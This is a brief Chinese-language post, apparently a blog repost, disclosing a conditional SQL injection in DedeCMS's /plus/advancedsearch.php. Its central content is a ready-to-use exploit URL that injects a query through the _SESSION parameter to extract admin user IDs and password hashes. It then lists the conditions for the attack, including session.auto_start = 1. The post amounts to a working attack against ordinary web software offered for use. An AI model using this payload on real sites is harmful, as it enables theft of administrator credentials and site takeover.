dedecms有条件sql注入(x0day)

https://www.t00ls.net/thread-35569-1-1.html

http://localhost/dedecms/plus/advancedsearch.php?mid=1&_SESSION[123]=select concat(0x7c,userid,0x7c,pwd,0x7c) as aid from `%23@__admin` aaa &sqlhash=123

条件利用:

1.漏洞代码在/plus/advancedsearch.php 文件中
2.是一个sql注入的漏洞
3.php要开启session.auto_start = 1
4.漏洞存在和session有关

原文地址:https://www.cnblogs.com/hookjoy/p/5820218.html